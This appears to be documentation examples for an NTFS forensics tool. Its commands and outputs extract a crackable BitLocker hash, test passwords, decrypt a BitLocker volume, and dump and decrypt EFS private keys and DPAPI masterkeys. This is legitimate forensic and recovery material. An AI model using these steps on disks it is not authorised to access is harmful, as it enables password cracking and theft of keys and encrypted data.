+--------------------------------------------------------------------------------------------------------------------+
| 2 | Recovery Password | {19b4a3e2-94b3-452f-a614-6212faeb1b9d} | Nonce : 01d5ecbb00f7155000000006 |
| | | | MAC : b9963d29e1bad1f42e60c3bfb6e3bef5 |
| | | | Encrypted Key : 97a43d40c695c6d190eba3956ac7c7b1 |
| | | | f5fdbbc7f9a61a77c914fa347479c7ac |
| | | | 6124ff46865e805367f7bef1 |
| | | | |
| | | | JtR Hash : $bitlocker$1$16$b9963d29e1bad1f4 |
| | | | 2e60c3bfb6e3bef5$1048576$12$5015 |
| | | | f700bbecd50106000000$60$3a06a06f |
| | | | db044d850ecd6faf5cf2aec997a43d40 |
| | | | c695c6d190eba3956ac7c7b1f5fdbbc7 |
| | | | f9a61a77c914fa347479c7ac6124ff46 |
| | | | 865e805367f7bef1 |
+--------------------------------------------------------------------------------------------------------------------+
bitlocker disk=3 volume=1 password=badpassword
FVE Version    : 2
State : ENCRYPTED
Size : 536870400 (512.00 MiBs)
Encrypted Size : 536870400 (512.00 MiBs)
Algorithm : AES-XTS-128
Timestamp : 2020-02-26 16:39:17

Tested Password:
----------------

+--------------------------------------------------------------------------------+
| Id | Type | GUID | Password | Result |
+--------------------------------------------------------------------------------+
| 1 | Password | {2dd368f3-37d7-414f-94e6-3c5b86fadd50} | badpassword | Invalid |
+--------------------------------------------------------------------------------+
bitlocker disk=3 volume=1 password=123456789
FVE Version    : 2
State : ENCRYPTED
Size : 536870400 (512.00 MiBs)
Encrypted Size : 536870400 (512.00 MiBs)
Algorithm : AES-XTS-128
Timestamp : 2020-02-26 16:39:17

Tested Password:
----------------

+--------------------------------------------------------------------------------------------------------------+
| Id | Type | GUID | Password | Result |
+--------------------------------------------------------------------------------------------------------------+
| 1 | Password | {2dd368f3-37d7-414f-94e6-3c5b86fadd50} | 123456789 | Valid |
| | | | | |
| | | | | VMK : 751bf363db63ba6f1b36fb2ecd5ff1d8 |
| | | | | f5eab77e8754a848f2743978c7615f9f |
| | | | | FVEK : 35b8197e6d74d8521f49698d5f556589 |
| | | | | 2cf286ae5323c65631965c905a9d7da4 |
+--------------------------------------------------------------------------------------------------------------+

Bitdecrypt
bitdecrypt disk=3 volume=1 output=decrypted.img fvek=35b8197e6d74d8521f49698d5f5565892cf286ae5323c65631965c905a9d7da4
[+] Opening \\?\Volume{09a02598-0000-0000-0002-000000000000}\
[+] Reading Bitlocker VBR
[-] Volume State : ENCRYPTED
[-] Size : 536870400 (512.00 MiBs)
[-] Encrypted Size : 536870400 (512.00 MiBs)
[-] Algorithm : AES-XTS-128
[+] Decrypting sectors
[-] Processed data size : 512.00 MiBs (100%)
[+] Duration : 7535ms
[+] Closing Volume

EFS-backup
efs.backup disk=0 volume=4 password=123456
Backup certificates and keys from \\.\PhysicalDrive0 > Volume:4
---------------------------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Listing user directories
8 directories found
[+] Searching for certificates
- 8BB98DE9ED4DBDD09AA1FF467ED71F0F28ACF61B
[+] Finding corresponding private keys
- 5f2870d8a6f1ef6487be2e1aee746fb5_bbc401c6-854a-4d12-9b65-8d52ca66cb6a
[+] Finding corresponding masterkeys
- 9ac19509-54d3-48bc-8c67-4cfb01d73498
[+] Exporting 1 certificates and keys (pass: backup)
- ef456e5b-43e4-4eda-a80b-e234611306d4 : Ok
Exported to 8BB98DE9ED4DBDD09AA1FF467ED71F0F28ACF61B.pfx

EFS-certificate
efs.certificate disk=0 volume=4
List certificates from \\.\PhysicalDrive0 > Volume:4
----------------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Listing user directories
8 directories found
[+] Searching for certificates
8 certificate(s) found
[+] Certificates
+-----------------------------------------------------------------------------------------------------------------------------------+
| Id | User | File | Certificate |
+-----------------------------------------------------------------------------------------------------------------------------------+
| 0 | Bobby | Name : 02728B6DF5573C5955A4DFF22319441C889C367B | Friendly Name : APNS certificate Direct |
| | | Record : 00000001d2d5h | |
| | | Size : 850.00 bytes | |
| | | | |
| | | Creation : 2019-05-11 15:59:29 | |
+-----------------------------------------------------------------------------------------------------------------------------------+
| 1 | Bobby | Name : 14BB7663C51C77FF5CAD89B4DC34495864338C67 | Friendly Name : APNS certificate |
| | | Record : 00000000b5a4h | |
| | | Size : 824.00 bytes | |
| | | | |
| | | Creation : 2021-03-03 18:02:33 | |
+-----------------------------------------------------------------------------------------------------------------------------------+
| 2 | Bobby | Name : 564481148D4DBDD09AA1FF467ED71F0F28ACF61B | Container : ef456e5b-36e4-4eda-a80b-e234611306d4 |
| | | Record : 00000000ab23h | Provider : Microsoft Enhanced Cryptographic Provider v1.0 |
| | | Size : 1.15 KiB | Type : PROV_RSA_FULL |
| | | | KeySpec : AT_KEYEXCHANGE |
| | | Creation : 2020-08-17 13:20:03 | |
+-----------------------------------------------------------------------------------------------------------------------------------+
..........
efs.certificate disk=0 volume=4 inode=0xb5a4
Display certificate from \\.\PhysicalDrive0 > Volume:4
------------------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Reading certificate file record: 46500
[+] Certificate
+----------------------------------------------------------------------------------------------------------------------------+
| Id | Property | Value |
+----------------------------------------------------------------------------------------------------------------------------+
| 0 | File | Creation : 2021-03-03 18:02:33 |
| | | Size : 824.00 bytes |
+----------------------------------------------------------------------------------------------------------------------------+
| 1 | CERT_SHA1_HASH_PROP_ID | 14A67663C51C66FF5CAD89B4DC34495864338C67 |
+----------------------------------------------------------------------------------------------------------------------------+
| 2 | CERT_FRIENDLY_NAME_PROP_ID | APNS certificate |
+----------------------------------------------------------------------------------------------------------------------------+
| 3 | CERT_KEY_IDENTIFIER_PROP_ID | 82B87AE4F2251242252A2644D98169F34F909CA8 |
+----------------------------------------------------------------------------------------------------------------------------+
| 4 | CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID | DB532C4794A15E5D0392C7C605FCBCA8 |
+----------------------------------------------------------------------------------------------------------------------------+
| 5 | CERT_CERTIFICATE_FILE | Data: |
| | | Version: 3 (0x2) |
| | | Serial Number: |
| | | 01:20:cb:ab:28:8a:97:ee:99:cc |
| | | Signature Algorithm: sha1WithRSAEncryption |
| | | Issuer: C=US, O=Apple Inc., OU=Apple iPhone, CN=Apple iPhone Device CA |
| | | Validity |
| | | Not Before: Mar 3 15:57:33 2021 GMT |
| | | Not After : Mar 3 16:02:33 2022 GMT |
| | | Subject: CN=1A6032AA-91A2-4B1D-B6AF-5509FC173686 |
| | | Subject Public Key Info: |
| | | Public Key Algorithm: rsaEncryption |
| | | RSA Public-Key: (1024 bit) |
| | | Modulus: |
| | | 00:a2:75:db:69:8d:c9:b3:fd:96:4d:28:b9:43:94: |
| | | db:7d:73:53:88:c9:79:e9:fa:de:e4:12:14:2c:de: |
...
| | | a7:6b:d0:01:9e:dc:66:27:ef:2e:20:7e:e5:2a:42: |
| | | 9e:6f:85:9c:b6:8f:be:d3:05 |
| | | Exponent: 65537 (0x10001) |
| | | X509v3 extensions: |
| | | X509v3 Authority Key Identifier: |
| | | keyid:B2:FE:21:23:44:86:95:6A:79:D5:81:26:8E:73:10:D |
| | | 8:A7:4C:8E:74 |
| | | X509v3 Subject Key Identifier: |
| | | 82:B8:7A:E4:F2:25:12:42:25:2A:26:44:D9:81:69:F3:4F:9 |
| | | 0:9C:A8 |
| | | X509v3 Basic Constraints: critical |
| | | CA:FALSE |
| | | X509v3 Key Usage: critical |
| | | Digital Signature, Key Encipherment |
| | | X509v3 Extended Key Usage: critical |
| | | TLS Web Server Authentication, TLS Web Client Authen |
| | | tication |
| | | 1.2.840.113635.100.6.10.6: |
| | | .. |
| | | Signature Algorithm: sha1WithRSAEncryption |
| | | 28:54:6c:d9:4e:97:f5:dd:1f:79:4a:6a:74:42:ad:6e:a1:11: |
...
| | | 27:58:3b:d5:1e:c3:71:af:6b:bd:fe:5d:ad:4d:bd:82:fa:53: |
| | | ff:0c |
+----------------------------------------------------------------------------------------------------------------------------+
efs.certificate disk=0 volume=4 inode=0xb5a4 output=mycert format=pem
Display certificate from \\.\PhysicalDrive0 > Volume:4
------------------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Reading certificate file record: 46500
[+] Certificate exported to mycert.pem

EFS-key
efs.key disk=0 volume=4
List keys from \\.\PhysicalDrive0 > Volume:4
--------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}
[+] Listing user directories:
8 directories found
[+] Searching for keys
9713 key(s) found
[+] Keys
+------------------------------------------------------------------------------------------------------------------+
| Id | User | Keyfile | Name | Creation Date |
+------------------------------------------------------------------------------------------------------------------+
| 0 | User1 | Name : 0004f7ed30db...017ee8d52ca6 | {15676EB3-D258-410F-85CB-9AB29E642CB3} | 2021-05-19 14:10:15 |
| | | Record : 0000000246c5h | | |
| | | Size : 4.00 KiBs | | |
+------------------------------------------------------------------------------------------------------------------+
| 1 | User1 | Name : 0016875547ba...f7a9606b4177 | {BA4B66DC-8C1D-4FDF-A1EF-78B64411D1AD} | 2020-02-03 19:37:39 |
| | | Record : 000000019f19h | | |
| | | Size : 4.00 KiBs | | |
+------------------------------------------------------------------------------------------------------------------+
| 2 | User1 | Name : 002a02ec680e...9a0a8d52ca67 | {3A3E1CF2-5AC2-4717-8006-D7C0F2936435} | 2019-06-26 15:50:50 |
..........
efs.key disk=0 volume=4 inode=742107
Encryption Alg : CALG_AES_256 | | | | Hash Alg : CALG_SHA_512 | | | | | | | | Salt : ABABD5324CCE0254BC726C3BF5A777D38BC4D75CACC2360EF3276EB4DC42FF6A | | | | | | | | HMAC : - | | | | HMAC2 : D24F0B0AF684AE986F1328EAAFC01DA346D2BADE2B84CBE3C94CCB338D449EA6 | | | | | | | | Encrypted Data : D7DAD9229C91DBC9608852A4411527D7 | | | | 58DB27E19596DD118F2D70F68CC7913C | ... | | | 7870F6C68DA1B9139BF6E39725F4E72E | | | | 4EC435C947F127CA3E333CB5E2F43978 | | | | | | | | Signature Data : 6077C027E6714A81C2710C5D334758F9AD463117DA4CBA8D0D05B5845A662E8F | | | | 5E38DCCAB05DA5DD6C8328F5CF925F378F229790D30A2BCC91D5E3370AE50FED | +------------------------------------------------------------------------------------------------------------------+ | 6 | Hash | 0000000000000000000000000000000000000000 | +------------------------------------------------------------------------------------------------------------------+ | 7 | ExportFlag | Version : 1 | | | | Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} | | | | MasterKey Version : 1 | | | | MasterKey GUID : {9ac19509-54d3-48bc-8c67-4cfb01d73498} | | | | | | | | Description : Export Flag | | | | Flags : 00000000h | | | | | | | | Encryption Alg : CALG_AES_256 | | | | Hash Alg : CALG_SHA_512 | | | | | | | | Salt : 772935C3582F625367716CE87D9626A524F15B9B7FF07166BB2C704B1223CB06 | | | | | | | | HMAC : - | | | | HMAC2 : 3BCA74ED2C83767F06D9FF907817FE85FBA65FDB72A94E9D8F2C7CF1D8E7DCA2 | | | | | | | | Encrypted Data : 875A6429226F11DFD3690D43BE633287 | | | | | | | | Signature Data : FD97F69A214C37D0DA968B5AA18EE7C80D475F72F650C8DCAE887C97E850DCD6 | | | | 9FA17D397A2375E362DE6F17193E3D084C06B0DCDB38E6C746150C1056145178 | +------------------------------------------------------------------------------------------------------------------+ ">
Display key from \\.\PhysicalDrive0 > Volume:4
----------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Reading key file record: 742107
[+] Key
+------------------------------------------------------------------------------------------------------------------+
| Id | Property | Value |
+------------------------------------------------------------------------------------------------------------------+
| 0 | File | Creation : 2021-09-23 22:16:43 |
| | | Size : 4.00 KiBs |
+------------------------------------------------------------------------------------------------------------------+
| 1 | Version | 0 |
+------------------------------------------------------------------------------------------------------------------+
| 2 | Name | ef456e5b-43e4-4eda-a80b-e234611306d4 |
+------------------------------------------------------------------------------------------------------------------+
| 3 | Flags | 00000000h |
+------------------------------------------------------------------------------------------------------------------+
| 4 | PublicKey | Magic : 31415352h (RSA1) |
| | | Size : 2048 |
| | | Exponent : 65537 |
| | | |
| | | Permissions : CRYPT_ENCRYPT |
| | | CRYPT_DECRYPT |
| | | CRYPT_EXPORT |
| | | CRYPT_READ |
...
| | | |
| | | Modulus : 96883F07FF78DA8354D037A94F897BD7 |
...
| | | FA77A3D04DD10D044761E65355B335B5 |
+------------------------------------------------------------------------------------------------------------------+
| 5 | Encrypted PrivateKey | Version : 1 |
| | | Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} |
| | | MasterKey Version : 1 |
| | | MasterKey GUID : {9ac19509-54d3-48bc-8c67-4cfb01d73498} |
| | | |
| | | Description : ClΓ© privΓ©e CryptoAPI |
| | | Flags : 00000000h |
| | | |
| | | Encryption Alg : CALG_AES_256 |
| | | Hash Alg : CALG_SHA_512 |
| | | |
| | | Salt : ABABD5324CCE0254BC726C3BF5A777D38BC4D75CACC2360EF3276EB4DC42FF6A |
| | | |
| | | HMAC : - |
| | | HMAC2 : D24F0B0AF684AE986F1328EAAFC01DA346D2BADE2B84CBE3C94CCB338D449EA6 |
| | | |
| | | Encrypted Data : D7DAD9229C91DBC9608852A4411527D7 |
| | | 58DB27E19596DD118F2D70F68CC7913C |
...
| | | 7870F6C68DA1B9139BF6E39725F4E72E |
| | | 4EC435C947F127CA3E333CB5E2F43978 |
| | | |
| | | Signature Data : 6077C027E6714A81C2710C5D334758F9AD463117DA4CBA8D0D05B5845A662E8F |
| | | 5E38DCCAB05DA5DD6C8328F5CF925F378F229790D30A2BCC91D5E3370AE50FED |
+------------------------------------------------------------------------------------------------------------------+
| 6 | Hash | 0000000000000000000000000000000000000000 |
+------------------------------------------------------------------------------------------------------------------+
| 7 | ExportFlag | Version : 1 |
| | | Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} |
| | | MasterKey Version : 1 |
| | | MasterKey GUID : {9ac19509-54d3-48bc-8c67-4cfb01d73498} |
| | | |
| | | Description : Export Flag |
| | | Flags : 00000000h |
| | | |
| | | Encryption Alg : CALG_AES_256 |
| | | Hash Alg : CALG_SHA_512 |
| | | |
| | | Salt : 772935C3582F625367716CE87D9626A524F15B9B7FF07166BB2C704B1223CB06 |
| | | |
| | | HMAC : - |
| | | HMAC2 : 3BCA74ED2C83767F06D9FF907817FE85FBA65FDB72A94E9D8F2C7CF1D8E7DCA2 |
| | | |
| | | Encrypted Data : 875A6429226F11DFD3690D43BE633287 |
| | | |
| | | Signature Data : FD97F69A214C37D0DA968B5AA18EE7C80D475F72F650C8DCAE887C97E850DCD6 |
| | | 9FA17D397A2375E362DE6F17193E3D084C06B0DCDB38E6C746150C1056145178 |
+------------------------------------------------------------------------------------------------------------------+
efs.key disk=0 volume=4 inode=742107 masterkey=34fac126105ce30...178c5bff4979eb
Decrypt key from \\.\PhysicalDrive0 > Volume:4
----------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Reading key file record: 742107
[-] Key
Encryption Algorithm : CALG_AES_256
Hash Algorithm : CALG_SHA_512
Salt : ABABD5324CCE0254BC726C33F5A777D38BC4D75CACC2360EF3276EB4DC42FF6A
[+] Decrypting key
[+] Clear key (2048bits):
+----------------------------------------------------------+
| Id | Property | Value |
+----------------------------------------------------------+
| 0 | Magic | RSA2 |
+----------------------------------------------------------+
| 1 | Bitsize | 2048 |
+----------------------------------------------------------+
| 2 | Permissions | CRYPT_ENCRYPT |
| | | CRYPT_DECRYPT |
| | | CRYPT_EXPORT |
| | | CRYPT_READ |
| | | CRYPT_WRITE |
| | | CRYPT_MAC |
| | | CRYPT_EXPORT_KEY |
| | | CRYPT_IMPORT_KEY |
+----------------------------------------------------------+
| 3 | Exponent | 65537 |
+----------------------------------------------------------+
| 4 | Modulus | 96883F07FF78DA8354D037A94F897BD7 |
...
| | | FA77A3D04DD10D044761E65355B335B5 |
+----------------------------------------------------------+
| 5 | Prime1 | C02F585644ED6326FF82368B0AD9ECD4 |
...
| | | 65F7DE6D173FEBEF95BE491FB222E07B |
+----------------------------------------------------------+
| 6 | Prime2 | C884376BBC50C2A14C495894FBF980DE |
...
| | | 6759E812B6385B9151EBED8DCD65238F |
+----------------------------------------------------------+
| 7 | Exponent1 | 0E33B17876918051427271EB667AE238 |
...
| | | 69349EF83ACE9B75D20004D155CDA3FF |
+----------------------------------------------------------+
| 8 | Exponent2 | 5BF265077E1EFA60C47E8DA423B751A4 |
...
| | | E7008F2EA5684A74E4BFEEFAAB48C979 |
+----------------------------------------------------------+
| 9 | Coefficient | 7D68AA3844F096959C23BD59E4BE3147 |
...
| | | 592ABC1BEDEBA6F5B4BDE3D0F9BEF7C5 |
+----------------------------------------------------------+
| 10 | Private Exponent | 2462A061AD85A7C3B0DF7764CC5DDDFA |
| | | 40D83B3FBF0D9D016C419E6B6744AD73 |
...
| | | 47685BDEB0FABDC21AF5CABBA13D138D |
| | | F39FC063F1F20323E3220229E29FA42D |
+----------------------------------------------------------+
efs.key disk=0 volume=4 inode=742107 masterkey=34...eb output=mykey format=pem
Decrypt key from \\.\PhysicalDrive0 > Volume:4
----------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Reading key file record: 742107
[-] Key
Encryption Algorithm : CALG_AES_256
Hash Algorithm : CALG_SHA_512
Salt : ABABD5324CCE0254BC726C33F5A777D38BC4D75CACC2360EF3276EB4DC42FF6A
[+] Decrypting key
[+] Public key exported to mykey.pub.pem.
[+] Private key exported to mykey.priv.pem.

EFS-masterkey
efs.masterkey disk=0 volume=4
List masterkeys from \\.\PhysicalDrive0 > Volume:4
--------------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Listing user directories
8 directories found
[+] Searching for keys
19 key(s), 2 preferred file(s) found
[+] MasterKeys
+--------------------------------------------------------------------------------------------------------------------------------------------------+
| Id | User | Keyfile | Key(s) | Creation Date |
+--------------------------------------------------------------------------------------------------------------------------------------------------+
| 0 | DefaultAppPool | Name : e4ed144f-6522-4471-8893-a6e29e175ba6 | MasterKey | 2021-08-17 14:54:41 |
| | | Record : 000000031848h | Version : 2 | |
| | | Size : 468.00 bytes | Algo : CALG_SHA_512 - CALG_AES_256 | |
| | | | Salt : FA737C82899CC3F61A3B332B15FDC241 | |
| | | | Rounds : 8000 | |
| | | | BackupKey | |
| | | | Version : 2 | |
| | | | Algo : CALG_SHA_512 - CALG_AES_256 | |
| | | | Salt : DF0651C903763132BC3043BF144A7DDD | |
| | | | Rounds : 8000 | |
| | | | CredHist | |
| | | | Version : 3 | |
| | | | GUID : {00000000-0000-0000-0000-000000000000} | |
+--------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | DefaultAppPool | Name : Preferred | Preferred | 2021-08-17 14:54:41 |
| | | Record : 00000003184ah | GUID : {e4ed144f-6522-4471-8893-a6e29e175ba6} | |
| | | Size : 24.00 bytes | Renew : 2021-11-15 12:54:41 | |
+--------------------------------------------------------------------------------------------------------------------------------------------------+
| 2 | Bob | Name : 26bd8b3d-e87f-4df3-a1af-18f434788090 | MasterKey | 2021-03-05 01:16:42 |
| | | Record : 000000004f4ah | Version : 2 | |
| | | Size : 468.00 bytes | Algo : CALG_SHA_512 - CALG_AES_256 | |
| | | | Salt : 39B575D1816DE8224B9E11C38E35EB34 | |
| | | | Rounds : 8000 | |
| | | | BackupKey | |
..........
efs.masterkey disk=0 volume=4 inode=0x80544
Display masterkey from \\.\PhysicalDrive0 > Volume:4
----------------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Reading masterkey file record: 525636
[+] MasterKey
+--------------------------------------------------------------------+
| Id | Property | Value |
+--------------------------------------------------------------------+
| 0 | File | Creation : 2020-07-06 05:56:06 |
| | | Size : 468.00 bytes |
+--------------------------------------------------------------------+
| 1 | Version | 2 |
+--------------------------------------------------------------------+
| 2 | GUID | 9ac19509-54d3-48bc-8c67-4cfb01d73498 |
+--------------------------------------------------------------------+
| 3 | Policy | 00000005h |
+--------------------------------------------------------------------+
| 4 | MasterKey | Version : 2 |
| | | Salt : 3ED4CDBCC4073D6724A512061D0597E1 |
| | | Rounds : 8000 |
| | | Hash Alg : CALG_SHA_512 |
| | | Enc Alg : CALG_AES_256 |
| | | Enc Key : 3610946FE1A7B9099D0AFA7658325014 |
| | | 296D1F0E5BA93249858BE3ACCC8FD7A8 |
| | | F62DB6808833FC303095C6588BDE3826 |
| | | 80ABF391222CD77661BCCB637DDAC490 |
| | | B5FC02C854EF45490EE10851EF524DE2 |
| | | 85DD508F905216D528D3DC3336830FF9 |
| | | 690472730A03D64CF892E06B9AA35692 |
| | | AB7679E908D487119030B73CB87E6F9F |
| | | 731F65609CB8ACA972BCC9042B27B9B4 |
+--------------------------------------------------------------------+
| 5 | BackupKey | Version : 2 |
| | | Salt : B60E21F9578D02A97964D7B10151BE69 |
| | | Rounds : 8000 |
| | | Hash Alg : CALG_SHA_512 |
| | | Enc Alg : CALG_AES_256 |
| | | Enc Key : CD5D3684873D6A1D66520FB1642779E1 |
| | | D78A649F02DDFE7C069F9B5F8FF9F005 |
| | | 7DC01E0A6AA9A815C8887BC1BF5B88E6 |
| | | E797DC5F4A3A0535B3217BADC7FAD38E |
| | | 798C1846423C8631DE472D790B308B2D |
| | | F15340B87FCD55A98DAEE92196235CF9 |
| | | B328FAF475C05A911DF19C99D54D5A3C |
+--------------------------------------------------------------------+
| 6 | CredHist | Version : 3 |
| | | GUID : {20e0b482-797f-429e-b4a0-30020731ef0a} |
+--------------------------------------------------------------------+
efs.masterkey disk=0 volume=4 inode=0x80544 sid="S-1-5-21-1521398...3175218-1001" password="ntfst00l"
Decrypt masterkey from \\.\PhysicalDrive0 > Volume:4
----------------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Reading masterkey file record: 525636
[-] Masterkey
Encryption Algorithm : CALG_AES_256
Hash Algorithm : CALG_SHA_512
Rounds : 8000
Salt : 3ED4CDBCC4073D6724A512061D0597E1
[+] Decrypting masterkey
[+] Clear masterkey (256bits):
34FAC126105CE302421A0FC7E3933FEC5639AA6BFF95000E6DA83AE67522EAB6
0AF58A27D834883B65611878B258AAAECD8983E3718E00F276178C5BFF4979EB

FVE
fve disk=3 volume=1 fve_block=2
Signature             : -FVE-FS-
Size : 57
Version : 2
Current State : ENCRYPTED (4)
Next State : ENCRYPTED (4)
Encrypted Size : 536870400 (512.00 MiBs)
Convert Size : 0
Backup Sectors : 16
FVE Block 1 : 0000000002100000
FVE Block 2 : 00000000059e4000
FVE Block 3 : 00000000092c8000
Backup Sectors Offset : 0000000002110000

FVE Metadata Header
-------------------

Size : 840
Version : 1
Header Size : 48
Copy Size : 840
Volume GUID : {70a57ea3-9b98-4034-8b6a-645f731e2d1e}
Next Counter : 10
Algorithm : AES-XTS-128 (8004)
Timestamp : 2020-02-26 16:39:17

FVE Metadata Entries (5)
------------------------

+----------------------------------------------------------------------------------------------------------------+
| Id | Version | Size | Entry Type | Value Type | Value |
+----------------------------------------------------------------------------------------------------------------+
| 1 | 1 | 72 | Drive Label | Unicode | String : TWN NTFSDRIVE 26/02/2020 |
+----------------------------------------------------------------------------------------------------------------+
| 2 | 1 | 224 | VMK | VMK | Key ID : {2dd368f3-37d7-414f-94e6-3c5b86f |
| | | | | | add50} |
| | | | | | Last Change : 2020-02-26 16:40:00 |
| | | | | | Protection : Password |
| | | | | | |
| | | | | | Property #1 - Stretch Key - 108 |
| | | | | | -------- |
| | | | | | Encryption : STRETCH KEY |
| | | | | | MAC : daea96439babc5d1e7f20c8860ff1ee9 |
| | | | | | |
| | | | | | Property #1.1 - AES-CCM - 80 |
| | | | | | -------- |
| | | | | | Nonce as Hex : 01d5ecbb00f71550 |
| | | | | | Nonce as Time : 2020-02-26 16:39:59 |
| | | | | | Nonce Counter : 00000002 |
| | | | | | MAC : 1dfebdc79a966e72ca806d6a83d8c7ba |
| | | | | | Key : eb51a188df981b54f51698c76d76a8bb |
| | | | | | d22afbbe27603ea6afc34c077726262e |
| | | | | | 5ba07482053d3c36fdecf80f |
| | | | | | |
| | | | | | Property #2 - AES-CCM - 80 |
| | | | | | -------- |
| | | | | | Nonce as Hex : 01d5ecbb00f71550 |
| | | | | | Nonce as Time : 2020-02-26 16:39:59 |
| | | | | | Nonce Counter : 00000003 |
| | | | | | MAC : 175ec23cd799e2bde9d24bf3697919fe |
| | | | | | Key : b76281568419ec3bee89d1eddccf3169 |
| | | | | | 59c466b6b392f40f0875e58168d868d7 |
| | | | | | 0788bd366bec117b11a9fd6e |
+----------------------------------------------------------------------------------------------------------------+
| 3 | 1 | 316 | VMK | VMK | Key ID : {19b4a3e2-94b3-452f-a614-6212fae |
| | | | | | b1b9d} |
| | | | | | Last Change : 2020-02-26 16:40:07 |
| | | | | | Protection : Recovery Password |
| | | | | | |
| | | | | | Property #1 - Stretch Key - 172 |
| | | | | | -------- |
| | | | | | Encryption : STRETCH KEY |
| | | | | | MAC : b9963d29e1bad1f42e60c3bfb6e3bef5 |
| | | | | | |
| | | | | | Property #1.1 - AES-CCM - 64 |
| | | | | | -------- |
| | | | | | Nonce as Hex : 01d5ecbb00f71550 |
| | | | | | Nonce as Time : 2020-02-26 16:39:59 |
| | | | | | Nonce Counter : 00000004 |
| | | | | | MAC : 8064d679c7d8d1fa8ae548b0844882c7 |
| | | | | | Key : 18d21021d40e3dc99d38c8dd84faed10 |
| | | | | | 370c32095f4f63261ad8ec40 |
| | | | | | |
| | | | | | Property #1.2 - AES-CCM - 80 |
| | | | | | -------- |
| | | | | | Nonce as Hex : 01d5ecbb00f71550 |
| | | | | | Nonce as Time : 2020-02-26 16:39:59 |
| | | | | | Nonce Counter : 00000005 |
| | | | | | MAC : 3d40f2b5fc0091b894b438763fcdf4cd |
| | | | | | Key : a0af0aeda32d977d26ac76f9fc429668 |
| | | | | | 955d2a6a49fe4e2323751924e47e6c39 |
| | | | | | 8c22f7fcd2d4272003cb7a4e |
| | | | | | |
| | | | | | Property #2 - AES-CCM - 80 |
| | | | | | -------- |
| | | | | | Nonce as Hex : 01d5ecbb00f71550 |
| | | | | | Nonce as Time : 2020-02-26 16:39:59 |
| | | | | | Nonce Counter : 00000006 |
| | | | | | MAC : 3a06a06fdb044d850ecd6faf5cf2aec9 |
| | | | | | Key : 97a43d40c695c6d190eba3956ac7c7b1 |
| | | | | | f5fdbbc7f9a61a77c914fa347479c7ac |
| | | | | | 6124ff46865e805367f7bef1 |
| | | | | | |
| | | | | | Property #3 - Unknown (00000015) |
| | | | | | - 28 |
| | | | | | -------- |
| | | | | | Unknown Value Type (21) |
+----------------------------------------------------------------------------------------------------------------+
| 4 | 1 | 80 | FKEV | AES-CCM | Nonce as Hex : 01d5ecbb00f71550 |
| | | | | | Nonce as Time : 2020-02-26 16:39:59 |
| | | | | | Nonce Counter : 00000008 |
| | | | | | MAC : 2ff7d7f79920e3509fb8d20cb15b62c8 |
| | | | | | Key : 097169b9a5c41420ed2353a4a4210763 |
| | | | | | a8833d1a4a88c6f7c0c45ec7c0959f25 |
| | | | | | 2c8eac3f306e9fd1e693784a |
+----------------------------------------------------------------------------------------------------------------+
| 5 | 1 | 100 | Volume Header Block | Offset and Size | Offset : 0000000002110000 |
| | | | | | Size : 0000000000002000 |
+----------------------------------------------------------------------------------------------------------------+

reparse
reparse disk=0 volume=4
[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] Reading $Extend\$Reparse
[+] 104 entries found
+----------------------------------------------------------------------------------------------------------------+
| Id | MFT Index | Filename | Type | Target/Data |
+----------------------------------------------------------------------------------------------------------------+
| 0 | 00000eb3 | debian.exe | AppExecLink | TheDebianProject.DebianGNULinux_ |
| | | | | 76v4gfsz19hv4 |
| | | | | |
| | | | | TheDebianProject.DebianGNULinux_ |
| | | | | 76v4gfsz19hv4!debian |
| | | | | |
| | | | | C:\Program Files\WindowsApps\The |
| | | | | DebianProject.DebianGNULinux_1.2 |
| | | | | .0.0_x64__76v4gfsz19hv4\debian.e |
| | | | | xe |
+----------------------------------------------------------------------------------------------------------------+
...
+----------------------------------------------------------------------------------------------------------------+
| 13 | 000007f9 | BaseLayer | Mount Point | \??\Volume{629458e4-0000-0000-00 |
| | | | | 00-010000000000}\ |
+----------------------------------------------------------------------------------------------------------------+
| 14 | 00013e24 | Watchdog | Mount Point | \??\C:\Program Files\NVIDIA Corp |
| | | | | oration\NvContainer\Watchdog |
+----------------------------------------------------------------------------------------------------------------+
...
+----------------------------------------------------------------------------------------------------------------+
| 102 | 00035861 | C2R64.dll | Symbolic Link | \??\C:\Program Files\Common File |
| | | | | s\Microsoft Shared\ClickToRun\C2 |
| | | | | R64.dll |
+----------------------------------------------------------------------------------------------------------------+
| 103 | 000986b0 | All Users | Symbolic Link | \??\C:\ProgramData |
+----------------------------------------------------------------------------------------------------------------+

logfile
logfile disk=4 volume=1 output=logfile.csv format=csv
[+] Opening \\?\Volume{00000001-0000-0000-0000-000000000000}\
[+] Reading $LogFile record
[-] $LogFile size : 4.14 MiBs
[+] Parsing $LogFile Restart Pages
[-] Newest Restart Page LSN : 5274485
[-] Volume marked as cleanly unmounted
[-] Client found : [1] NTFS
[+] Parsing $LogFile Record Pages
[-] $LogFile Record Page Count: 86
[+] Parsing $LogFile Records: 601
[+] Closing volume
Sample of logfile.csv
